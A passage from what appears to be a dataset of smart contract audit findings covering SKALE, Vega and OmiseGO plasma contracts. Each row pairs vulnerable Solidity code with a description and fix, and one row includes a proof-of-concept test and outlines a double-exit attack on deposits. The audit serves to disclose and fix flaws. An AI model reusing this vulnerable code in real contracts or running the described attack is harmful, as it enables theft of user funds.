The problem here is that it would be impossible to compare values to zero.","Consider not calling `revert` on these subtractions and make result value be equals to zero if underflow happens.\\nConsider comparing to some small `epsilon` value instead of zero. Or similar to the previous point, on every subtraction check if the value is smaller then `epsilon`, and make it zero if it is.",,"```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n" +Slashes do not affect bounty distribution,high,"When slashes are processed by a holder, only `_delegatedByHolderToValidator` and `_delegatedByHolder` values are reduced. But `_effectiveDelegatedByHolderToValidator` value remains the same. This value is used to distribute bounties amongst delegators. 
So slashing will not affect that distribution.\\n```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\n",Reduce `_effectiveDelegatedByHolderToValidator` and `_effectiveDelegatedToValidator` when slashes are processed.,,"```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\n" +Storage operations optimization,medium,"There are a lot of operations that write some value to the storage (uses `SSTORE` opcode) without actually changing it.\\nIn `getAndUpdateValue` function of `DelegationController` and TokenLaunchLocker:\\n```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n\\nIn `handleSlash` function of `Punisher` contract `amount` will be zero in most cases:\\n```\\nfunction handleSlash(address holder, uint amount) external allow(""DelegationController"") {\\n \\_locked[holder] = \\_locked[holder].add(amount);\\n}\\n```\\n",Resolution\\nMitigated in skalenetwork/skale-manager#179\\nCheck if the value is the same and don't 
write it to the storage in that case.,,```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n +Function overloading,low,"Some functions in the codebase are overloaded. That makes code less readable and increases the probability of missing bugs.\\nFor example, there are a lot of `reduce` function implementations in DelegationController:\\n```\\nfunction reduce(PartialDifferencesValue storage sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (hasSumSequence) 
{\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\n",Resolution\\nFixed in skalenetwork/skale-manager#181\\nAvoid function overloading as a general guideline.,,"```\\nfunction reduce(PartialDifferencesValue storage 
sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n if (hasSumSequence) {\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n 
}\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, ""Can't reduce value in the past"");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, ""Increasing of values is not implemented"");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\n" +ERC20Lockable - inconsistent locking status,low,"`Vega_Token.is_tradable()` will incorrectly return `false` if the token is never manually unlocked by the owner but `unlock_time` has passed, which will automatically unlock trading.\\n```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. 
Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\n",declare `_is_locked` as `private` instead of `public`\\ncreate a getter method that correctly returns the locking status\\n```\\nfunction \\_isLocked() internal view {\\n return !\\_is\\_locked || now > unlock\\_date;\\n}\\n```\\n\\nmake `modifier onlyUnlocked()` use the newly created getter (_isLocked())\\nmake `Vega_Token.is_tradeable()` use the newly created getter (_isLocked())\\n`_unlock()` should raise an errorcondition when called on an already unlocked contract\\nit could make sense to emit a “contract hast been unlocked” event for auditing purposes,,"```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\n" +Merkle.checkMembership allows existence proofs for the same leaf in multiple locations in the tree,high,"`checkMembership` is used by several contracts to prove that transactions exist in the child chain. The function uses a `leaf`, an `index`, and a `proof` to construct a hypothetical root hash. This constructed hash is compared to the passed in `rootHash` parameter. 
If the two are equivalent, the `proof` is considered valid.\\nThe proof is performed iteratively, and uses a pseudo-index (j) to determine whether the next proof element represents a “left branch” or “right branch”:\\n```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n\\nIf `j` is even, the computed hash is placed before the next proof element. If `j` is odd, the computed hash is placed after the next proof element. After each iteration, `j` is decremented by `j` = `j` / 2.\\nBecause `checkMembership` makes no requirements on the height of the tree or the size of the proof relative to the provided `index`, it is possible to pass in invalid values for `index` that prove a leaf's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that for a tree with 3 leaves, leaf 2 can be proven to exist at indices 2, 6, and 10 using the same proof each time. 
The modified test can be found here: https://gist.github.com/wadeAlexC/01b60099282a026f8dc1ac85d83489fd#file-merkle-test-js-L40-L67\\n```\\nit('should accidentally allow different indices to use the same proof', async () => {\\n const rootHash = this.merkleTree.root;\\n const proof = this.merkleTree.getInclusionProof(leaves[2]);\\n\\n const result = await this.merkleContract.checkMembership(\\n leaves[2],\\n 2,\\n rootHash,\\n proof,\\n );\\n expect(result).to.be.true;\\n\\n const nextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 6,\\n rootHash,\\n proof,\\n );\\n expect(nextResult).to.be.true;\\n\\n const nextNextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 10,\\n rootHash,\\n proof,\\n );\\n expect(nextNextResult).to.be.true;\\n});\\n```\\n\\nConclusion\\nExit processing is meant to bypass exits processed more than once. This is implemented using an “output id” system, where each exited output should correspond to a unique id that gets flagged in the `ExitGameController` contract as it's exited. Before an exit is processed, its output id is calculated and checked against `ExitGameController`. If the output has already been exited, the exit being processed is deleted and skipped. Crucially, output id is calculated differently for standard transactions and deposit transactions: deposit output ids factor in the transaction index.\\nBy using the behavior described in this issue in conjunction with methods discussed in issue 5.8 and https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20, we showed that deposit transactions can be exited twice using indices `0` and `2**16`. 
Because of the distinct output id calculation, these exits have different output ids and can be processed twice, allowing users to exit double their deposited amount.\\nA modified `StandardExit.load.test.js` shows that exits are successfully enqueued with a transaction index of 65536: https://gist.github.com/wadeAlexC/4ad459b7510e512bc9556e7c919e0965#file-standardexit-load-test-js-L55","Use the length of the proof to determine the maximum allowed index. The passed-in index should satisfy the following criterion: `index < 2**(proof.length/32)`. Additionally, ensure range checks on transaction position decoding are sufficiently restrictive (see https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20).\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/546",,"```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n" +Improper initialization of spending condition abstraction allows “v2 transactions” to exit using PaymentExitGame,high,"`PaymentOutputToPaymentTxCondition` is an abstraction around the transaction signature check needed for many components of the exit games. 
Its only function, `verify`, returns `true` if one transaction (inputTxBytes) is spent by another transaction (spendingTxBytes):\\n```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, ""Input tx is an unsupported payment tx type"");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, ""The spending tx is an unsupported payment tx type"");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n ""Spending tx points to the incorrect output UTXO position""\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), ""Tx in not signed correctly"");\\n\\n return true;\\n}\\n```\\n\\nVerification process\\nThe verification process is relatively straightforward. The contract performs some basic input validation, checking that the input transaction's `txType` matches `supportInputTxType`, and that the spending transaction's `txType` matches `supportSpendingTxType`. 
These values are set during construction.\\nNext, `verify` checks that the spending transaction contains an input that matches the position of one of the input transaction's outputs.\\nFinally, `verify` performs an EIP-712 hash on the spending transaction, and ensures it is signed by the owner of the output in question.\\nImplications of the abstraction\\nThe abstraction used requires several files to be visited to fully understand the function of each line of code: `ISpendingCondition`, `PaymentEIP712Lib`, `UtxoPosLib`, `TxPosLib`, `PaymentTransactionModel`, `PaymentOutputModel`, `RLPReader`, `ECDSA`, and `SpendingConditionRegistry`. Additionally, the abstraction obfuscates the underlying spending condition verification primitive where used.\\nFinally, understanding the abstraction requires an understanding of how `SpendingConditionRegistry` is initialized, as well as the nature of its relationship with `PlasmaFramework` and `ExitGameRegistry`. The aforementioned `txType` values, `supportInputTxType` and `supportSpendingTxType`, are set during construction. Their use in `ExitGameRegistry` seems to suggest they are intended to represent different versions of transaction types, and that separate exit game contracts are meant to handle different transaction types:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nMigration and initialization\\nThe migration script seems to corroborate this interpretation:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L109-L124\\n```\\n// handle spending condition\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentCondition = await PaymentOutputToPaymentTxCondition.deployed();\\n\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_V2\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentV2Condition = await PaymentOutputToPaymentTxCondition.deployed();\\n```\\n\\nThe migration script shown above deploys two different versions of `PaymentOutputToPaymentTxCondition`. 
The first sets `supportInputTxType` and `supportSpendingTxType` to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_TX_TYPE`, respectively. The second sets those same variables to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_V2_TX_TYPE`, respectively.\\nThe migration script then registers both of these contracts in `SpendingConditionRegistry`, and then calls `renounceOwnership`, freezing the spending conditions registered permanently:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L126-L135\\n```\\nconsole.log(`Registering paymentToPaymentCondition (${paymentToPaymentCondition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_TX\\_TYPE, paymentToPaymentCondition.address,\\n);\\n\\nconsole.log(`Registering paymentToPaymentV2Condition (${paymentToPaymentV2Condition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_V2\\_TX\\_TYPE, paymentToPaymentV2Condition.address,\\n);\\nawait spendingConditionRegistry.renounceOwnership();\\n```\\n\\nFinally, the migration script registers a single exit game contract in PlasmaFramework:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L137-L143\\n```\\n// register the exit game to framework\\nawait plasmaFramework.registerExitGame(\\n PAYMENT\\_TX\\_TYPE,\\n paymentExitGame.address,\\n config.frameworks.protocols.moreVp,\\n { from: maintainerAddress },\\n);\\n```\\n\\nNote that the associated `_txType` is permanently associated with the deployed exit game contract:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. 
Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nConclusion\\nCrucially, this association is never used. It is implied heavily that transactions with some `txType` must use a certain registered exit game contract. In fact, this is not true. When using `PaymentExitGame`, its routers, and their associated controllers, the `txType` is invariably inferred from the encoded transaction, not from the mappings in `ExitGameRegistry`. If initialized as-is, both `PAYMENT_TX_TYPE` and `PAYMENT_V2_TX_TYPE` transactions may be exited using `PaymentExitGame`, provided they exist in the plasma chain.","Remove `PaymentOutputToPaymentTxCondition` and `SpendingConditionRegistry`\\nImplement checks for specific spending conditions directly in exit game controllers. 
Emphasize clarity of function: ensure it is clear when called from the top level that a signature verification check and spending condition check are being performed.\\nIf the inferred relationship between `txType` and `PaymentExitGame` is correct, ensure that each `PaymentExitGame` router checks for its supported `txType`. Alternatively, the check could be made in `PaymentExitGame` itself.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/472",,"```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, ""Input tx is an unsupported payment tx type"");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, ""The spending tx is an unsupported payment tx type"");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n ""Spending tx points to the incorrect output UTXO position""\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), ""Tx in not signed correctly"");\\n\\n return true;\\n}\\n```\\n" +RLPReader - Leading zeroes allow multiple valid encodings and exit / output ids for the same transaction,high,"The current implementation of RLP decoding can take 2 different `txBytes` and decode them to the same structure. Specifically, the `RLPReader.toUint` method can decode 2 different types of bytes to the same number. 
For example:\\n`0x821234` is decoded to `uint(0x1234)`\\n`0x83001234` is decoded to `uint(0x1234)`\\n`0xc101` can decode to `uint(1)`, even though the tag specifies a short list\\n`0x01` can decode to `uint(1)`, even though the tag specifies a single byte\\nAs explanation for this encoding:\\n`0x821234` is broken down into 2 parts:\\n`0x82` - represents `0x80` (the string tag) + `0x02` bytes encoded\\n`0x1234` - are the encoded bytes\\nThe same for 0x83001234:\\n`0x83` - represents `0x80` (the string tag) + `0x03` bytes encoded\\n`0x001234` - are the encoded bytes\\nThe current implementation casts the encoded bytes into a uint256, so these different encodings are interpreted by the contracts as the same number:\\n`uint(0x1234) = uint(0x001234)`\\n```\\nresult := mload(memPtr)\\n```\\n\\nHaving different valid encodings for the same data is a problem because the encodings are used to create hashes that are used as unique ids. This means that multiple ids can be created for the same data. 
The data should only have one possible id.\\nThe encoding is used to create ids in these parts of the code:\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex, \\_utxoPosValue));\\n```\\n\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex));\\n```\\n\\n```\\nbytes32 hashData = keccak256(abi.encodePacked(\\_txBytes, \\_utxoPos.value));\\n```\\n\\n```\\nreturn uint160((uint256(keccak256(\\_txBytes)) 105).setBit(151));\\n```\\n\\n```\\nbytes32 leafData = keccak256(data.txBytes);\\n```\\n\\nOther methods that are affected because they rely on the return values of these methods:","Enforce strict-length decoding for `txBytes`, and specify that `uint` is decoded from a 32-byte short string.\\nEnforcing a 32-byte length for `uint` means that `0x1234` should always be encoded as:\\n`0xa00000000000000000000000000000000000000000000000000000000000001234`\\n`0xa0` represents the tag + the length: `0x80 + 32`\\n`0000000000000000000000000000000000000000000000000000000000001234` is the number 32 bytes long with leading zeroes\\nUnfortunately, using leading zeroes is against the RLP spec:\\nhttps://github.com/ethereum/wiki/wiki/RLP\\npositive RLP integers must be represented in big endian binary form with no leading zeroes\\nThis means that libraries interacting with OMG contracts which are going to correctly and fully implement the spec will generate “incorrect” encodings for uints; encodings that are not going to be recognized by the OMG contracts.\\nFully correct spec encoding: `0x821234`. Proposed encoding in this solution: `0xa00000000000000000000000000000000000000000000000000000000000001234`.\\nSimilarly enforce restrictions where they can be added; this is possible because of the strict structure format that needs to be encoded.\\nSome other potential solutions are included below. 
Note that these solutions are not recommended for reasons included below:\\nNormalize the encoding that gets passed to methods that hash the transaction for use as an id:\\nThis can be implemented in the methods that call `keccak256` on `txBytes` and should decode and re-encode the passed `txBytes` in order to normalize the passed encoding.\\na `txBytes` is passed\\nthe `txBytes` are decoded into structure: `tmpDecodedStruct` = decode(txBytes)\\nthe `tmpDecodedStruct` is re-encoded in order to normalize it: `normalizedTxBytes = encode(txBytes)`\\nThis method is not recommended because it needs a Solidity encoder to be implemented and a lot of gas will be used to decode and re-encode the initial `txBytes`.\\nCorrectly and fully implement RLP decoding\\nThis is another solution that adds a lot of code and is prone to errors.\\nThe solution would be to enforce all of the restrictions when decoding and not accept any encoding that doesn't fully follow the spec. This for example means that is should not accept uints with leading zeroes.\\nThis is a problem because it needs a lot of code that is not easy to write in Solidity (or EVM).",,```\\nresult := mload(memPtr)\\n```\\n +Recommendation: Remove TxFinalizationModel and TxFinalizationVerifier. Implement stronger checks in Merkle,medium,"`TxFinalizationVerifier` is an abstraction around the block inclusion check needed for many of the features of plasma exit games. It uses a struct defined in `TxFinalizationModel` as inputs to its two functions: `isStandardFinalized` and `isProtocolFinalized`.\\n`isStandardFinalized` returns the result of an inclusion proof. 
Although there are several branches, only the first is used:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is ""standard finalized""\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(""MVP is not yet supported"");\\n } else {\\n revert(""Invalid protocol value"");\\n }\\n}\\n```\\n\\n`isProtocolFinalized` is unused:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is ""protocol finalized""\\n\\* @dev MVP: must be standard finalized\\n\\* @dev MoreVp: allows in-flight tx, so only checks for the existence of the transaction\\n\\*/\\nfunction isProtocolFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return data.txBytes.length > 0;\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(""MVP is not yet supported"");\\n } else {\\n revert(""Invalid protocol value"");\\n }\\n}\\n```\\n\\nThe abstraction used introduces branching logic and requires several files to be visited to fully understand the function of each line of code: `ITxFinalizationVerifier`, `TxFinalizationModel`, `TxPosLib`, `Protocol`, `BlockController`, and `Merkle`. Additionally, the abstraction obfuscates the underlying inclusion proof primitive when used in the exit game contracts. 
